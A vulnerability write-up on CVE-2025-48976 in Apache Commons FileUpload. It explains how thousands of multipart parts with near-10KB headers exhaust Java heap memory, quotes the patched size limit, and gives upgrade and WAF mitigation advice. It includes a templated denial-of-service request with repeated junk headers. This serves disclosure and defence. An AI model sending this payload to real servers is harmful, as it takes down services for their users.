Jan 23, 2026·4 min read·29 visits
Apache Commons FileUpload allowed multipart part headers to be up to 10KB by default. By sending thousands of parts in a single request, an attacker can force the server to allocate massive amounts of memory for headers, leading to an OutOfMemoryError (OOM) and Denial of Service. Fixed in 1.6 and 2.0.0-M4 by dropping the default limit to 512 bytes.
Apache Commons FileUpload, the ubiquitous Java library for handling multipart file uploads, failed to strictly limit the size of headers within individual multipart sections. This allows attackers to exhaust server memory via a 'Cumulative Resource Exhaustion' attack.
If you are a Java developer, you have used Apache Commons FileUpload. It is the silent workhorse behind multipart/form-data parsing in nearly every major framework—Tomcat, Struts, Spring (historically), and countless enterprise monoliths. It is the plumbing of the Java web world.
But plumbing is only interesting when it explodes. CVE-2025-48976 is exactly that kind of explosion. It isn't a sexy RCE involving deserialization gadget chains; it's a brute-force assault on the logic of how we handle input.
The vulnerability lies in a simple assumption: that a user uploading a file will behave reasonably. The developers assumed that the headers describing a file part (like Content-Disposition or Content-Type) wouldn't be excessively large. They were wrong. And because they were wrong, we can crash the server.
Here is the issue: When you send a multipart request, it's split into 'parts'. Each part has its own set of headers. In affected versions of Commons FileUpload (1.x < 1.6 and 2.x < 2.0.0-M4), the library enforced a limit on these headers, but it was surprisingly generous: 10,240 bytes (10KB) per part.
> [!WARNING] > 10KB doesn't sound like much, right?
Wrong. That is 10KB per part. The library didn't account for an attacker sending a single HTTP POST request containing 10,000 parts.
Do the math: 10,000 parts * 10KB headers = 100 MB of raw string data. Now add the overhead of Java String objects (which are not memory-efficient), the internal buffering in MultipartStream, and the CPU cycles required to trim, parse, and map those headers. You are suddenly looking at gigabytes of heap allocation for a request that takes seconds to generate. This is Cumulative Resource Exhaustion.
The fix is brutal but effective. The maintainers realized that legitimate multipart headers (like Content-Disposition: form-data; name="file"; filename="holiday_photos.jpg") are rarely larger than a tweet. They didn't need a 10KB buffer.
In the patch (Commit b247774...), they introduced a new, stricter configuration partHeaderSizeMax and slashed the default limit drastically.
The Vulnerable Configuration (Implicit):
// Roughly 10KB hardcoded or loosely enforced
public static final int HEADER_PART_SIZE_MAX = 10240;The Fixed Code (v1.6 / v2.0.0-M4):
// Default slashed to 512 bytes
public static final int DEFAULT_PART_HEADER_SIZE_MAX = 512;
// Inside MultipartStream.readHeaders()
if (headersSize > partHeaderSizeMax) {
throw new FileUploadIOException(
new SizeLimitExceededException(
"The header section of a part is too large",
headersSize,
partHeaderSizeMax
)
);
}By enforcing a 512-byte limit, they forced the attack cost up significantly. To consume the same amount of memory, an attacker would need to send 20x more parts, likely hitting other limits (like total request size or connection timeouts) before the JVM crashes.
Exploiting this is trivially easy. You don't need Metasploit; you need a few lines of Python. We essentially want to spam the server with valid boundaries, but stuff the headers of each part with junk until we hit just under that 10KB limit.
Here is what the payload structure looks like:
POST /upload HTTP/1.1
Host: vulnerable-app.com
Content-Type: multipart/form-data; boundary=---------------------------123456789
Content-Length: [Huge]
---------------------------123456789
Content-Disposition: form-data; name="part1"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA
[small body content]
---------------------------123456789
Content-Disposition: form-data; name="part2"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA
[small body content]
... [Repeat 50,000 times] ...When the Java application receives this, readHeaders() allocates a buffer for Part 1. Validates it (it's under 10KB, so it passes). Keeps it in memory. Moves to Part 2. Allocates. Validates. Keeps.
Eventually, the Garbage Collector (GC) enters a 'panic mode' (GC Thrashing), trying to free up space that is legally being held by the active request thread. CPU spikes to 100%, and shortly after: java.lang.OutOfMemoryError: Java heap space.
This is a mandatory upgrade for anyone exposing file uploads to the internet.
mvn dependency:tree | grep fileupload.If you absolutely cannot upgrade (why?), you might be able to mitigate this with a WAF rule that blocks requests with an excessive number of Content-Disposition headers or abnormally large Content-Type headers, though this is fragile.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
Apache Commons FileUpload Apache Software Foundation | < 1.6 | 1.6 |
Apache Commons FileUpload Apache Software Foundation | 2.0.0-M1 - 2.0.0-M3 | 2.0.0-M4 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-770 |
| Attack Vector | Network |
| CVSS | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| EPSS Score | 0.0017 |
| Exploit Status | PoC Available |
Allocation of Resources Without Limits or Throttling